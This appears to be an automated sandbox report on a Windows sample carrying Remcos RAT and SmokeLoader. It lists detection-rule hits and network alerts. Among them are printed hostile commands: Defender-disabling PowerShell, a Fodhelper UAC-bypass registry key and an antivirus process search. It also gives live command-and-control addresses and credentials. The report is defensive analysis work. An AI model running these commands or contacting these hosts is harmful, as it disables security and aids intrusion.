                        Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, SourceProcessId: 2004, StartAddress: 330F7A7, TargetImage: C:\Windows\SysWOW64\findstr.exe, TargetProcessId: 2004
                        Sigma detected: Suspicious Reg Add Open Command
                        Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f", CommandLine: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentImage: C:\Users\user\AppData\Local\Temp\DE5A.exe, ParentProcessId: 3468, ParentProcessName: DE5A.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f", ProcessId: 3796, ProcessName: cmd.exe
                        Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bound.exe, ProcessId: 1860, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-ZZZU66
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2116, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 4928, ProcessName: powershell.exe

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Sigma detected: Search for Antivirus process
                        Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6800, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7136, ProcessName: findstr.exe

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Remcos
                        Source: Registry Key setAuthor: Joe Security: Data: Details: 9B 4F 24 99 8D 57 CF 27 E2 61 C8 D5 53 E5 08 57 BF AD 46 E0 E1 EA 8C 96 33 37 76 F3 3C F0 0C 0D 57 60 81 F9 15 B2 90 A2 89 E7 5E 37 03 4C 22 15 6F D2 AE 6D 86 30 BB 10 90 8D E7 6A D7 DD 03 D1 D9 EA 65 A1 7C D5 9E 11 2A 5B 54 FE F6 D4 EC 42 19 18 B6 18 40 BF 59 39 06 D0 16 77 21 3E 15 68 EA FC 97 DC 20 1C 32 A3 DD 8B 76 61 86 BE 5B 4B 9A F3 7C 70 3E C6 96 FC C3 69 DD DC 7F E2 CF 59 F8 29 EE D2 E9 62 4E 7F 6C 50 DF E6 6A E7 DB 4E 0D A5 EF F3 69 C6 C0 8C 7E 69 BC C6 3E B8 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, ProcessId: 6948, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-ZZZU66\exepath

                        Snort Signatures

                        Timestamp:05/08/24-16:41:19.549710
                        SID:2039103
                        Source Port:49744
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/08/24-16:41:22.482663
                        SID:2039103
                        Source Port:49747
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/08/24-16:41:03.912735
                        SID:2039103
                        Source Port:49739
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/08/24-16:41:06.812550
                        SID:2039103
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/08/24-16:41:21.026860
                        SID:2039103
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/08/24-16:41:25.414325
                        SID:2039103
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/08/24-16:41:05.348624
                        SID:2039103
                        Source Port:49740
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/08/24-16:41:08.297665
                        SID:2039103
                        Source Port:49742
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/08/24-16:41:23.944554
                        SID:2039103
                        Source Port:49748
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                        Source: https://2no.co/1gFnW4Avira URL Cloud: Label: malware
                        Source: https://2no.co/Avira URL Cloud: Label: malware
                        Source: http://piratia.su/tmp/index.phpAvira URL Cloud: Label: malware
                        Source: http://h-c-v.ru/tmp/index.phpAvira URL Cloud: Label: malware
                        Source: https://2no.co/1gFnW4ZwAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "193.149.176.178:2404:1", "Assigned name": "WindowsUpdateServices", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "WindowsUpdateServices.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZZZU66", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                        Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
                        Multi AV Scanner detection for submitted file
                        Source: Og1SeeXcB2.exeReversingLabs: Detection: 18%
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Machine Learning detection for sample
                        Source: Og1SeeXcB2.exeJoe Sandbox ML: detected
                        Source: DE5A.exe, 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_3027aa14-7

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED

                        Privilege Escalation

                        barindex
                        UAC bypass detected (Fodhelper)
                        Source: C:\Windows\System32\reg.exeRegistry value created: NULL C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Windows\System32\reg.exeRegistry value created: DelegateExecute
                        Source: Og1SeeXcB2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 65.108.69.93:443 -> 192.168.2.4:49743 version: TLS 1.2
                        Source: Og1SeeXcB2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403438900.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465611078.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2399325096.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460226793.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdb source: DE5A.exe, 00000016.00000002.2473628005.00007FFE00521000.00000002.00000001.01000000.0000000E.sdmp, DE5A.exe, 0000002E.00000002.2593349908.00007FFDFF1F1000.00000002.00000001.01000000.0000001E.sdmp
                        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398989773.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459894595.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401360422.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463605579.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402204452.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464706425.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400126816.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461133186.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402315166.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464926673.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399657698.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460572839.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402055879.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464578938.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: DE5A.exe, 00000016.00000002.2478711544.00007FFE1A4F1000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402204452.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464706425.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400503433.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461614650.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398744659.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459639883.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403881706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466175167.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401474807.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463811905.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400375213.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461439949.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: DE5A.exe, 00000016.00000002.2477766609.00007FFE1A4CC000.00000040.00000001.01000000.00000013.sdmp, DE5A.exe, 0000002E.00000002.2599019605.00007FFE1A52C000.00000040.00000001.01000000.00000023.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400772483.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462415733.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399228016.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460126912.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402055879.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464578938.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403881706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466175167.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: DE5A.exe, 00000016.00000002.2470814485.00007FFDFB7F2000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399541989.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460460068.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401360422.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463605579.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2401237563.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463409848.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400375213.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461439949.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: DE5A.exe, 00000015.00000003.2397605685.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2479674945.00007FFE1A533000.00000002.00000001.01000000.00000010.sdmp, DE5A.exe, 00000027.00000003.2457880872.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2595982386.00007FFE11573000.00000002.00000001.01000000.00000020.sdmp
                        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2400027903.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461011324.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401013743.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462996367.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403783191.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466040313.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: DE5A.exe, 00000015.00000003.2400644859.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461857558.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398989773.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459894595.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399908877.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460830926.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400027903.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461011324.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400256199.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461293936.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: DE5A.exe, 00000016.00000002.2475941102.00007FFE1A481000.00000040.00000001.01000000.00000018.sdmp, DE5A.exe, 0000002E.00000002.2598135360.00007FFE1A481000.00000040.00000001.01000000.00000028.sdmp
                        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400892291.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462814169.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
